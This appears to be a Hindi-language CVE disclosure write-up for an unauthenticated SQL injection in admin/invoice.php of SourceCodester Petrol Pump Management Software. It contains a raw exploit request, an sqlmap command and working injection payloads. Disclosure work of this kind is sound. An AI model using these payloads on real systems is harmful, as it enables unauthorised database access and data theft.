
CVE-2024-10355 का पुनरुत्पादन और विश्लेषण, जो SourceCodester Petrol Pump Management Software में एक अप्रमाणित SQL इंजेक्शन भेद्यता है, जिसमें प्रूफ-ऑफ-कॉन्सेप्ट पेलोड और शोषण चरण शामिल हैं।
पेट्रोल पंप प्रबंधन सॉफ्टवेयर मुफ्त डाउनलोड | SourceCodester
sourcecodester पेट्रोल पंप प्रबंधन सॉफ्टवेयर v1.0 में SQL इंजेक्शन कमजोरी, एक ऐसी कमजोरी पाई गई है जिसे उच्च जोखिम के रूप में रेट किया गया है, जो admin\invoice.php फ़ाइल की कुछ अज्ञात कार्यक्षमता को प्रभावित करती है, पैरामीटर id का उपयोग करके दुर्भावनापूर्ण SQL स्टेटमेंट बनाकर संवेदनशील जानकारी प्राप्त करती है, जिससे नुकसान होता है
admin\invoice.php

यहाँ, उपयोगकर्ता इनपुट $_POST['id'] को SQL क्वेरी स्टेटमेंट में जोड़ा जाता है, जो स्पष्ट रूप से SQL इंजेक्शन हमलों के लिए संवेदनशील है

POST /admin/invoice.php HTTP/1.1
Host: 10.151.167.168:6677
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
id=1*
पैकेट को सेव करें और sqlmap हमले का उपयोग करें
python3 sqlmap.py --random-agent -r data.txt --risk 3 --batch

---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-6094' OR 1911=1911 AND 'hAoG'='hAoG
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=1';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1041 FROM (SELECT(SLEEP(5)))UTeR) AND 'HnhT'='HnhT
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176626b71,0x6b57657774656652476e4d594f6959545363546f73424a4c547364484a4d47696247447769514653,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
पैकेट को देखें, मैंने कोई कुकी मान नहीं जोड़ा, जो दर्शाता है कि प्रमाणीकरण की आवश्यकता नहीं है और दूर से हमले शुरू करने के लिए लॉग इन करने की आवश्यकता नहीं है
आप देख सकते हैं कि यह पेलोड दो इंजेक्शन विधियों का उपयोग करता है, टाइम-बेस्ड ब्लाइंड, बूलियन-बेस्ड ब्लाइंड, स्टैक्ड क्वेरी और UNION क्वेरी, और सफलतापूर्वक डेटाबेस का नाम इंजेक्ट करता है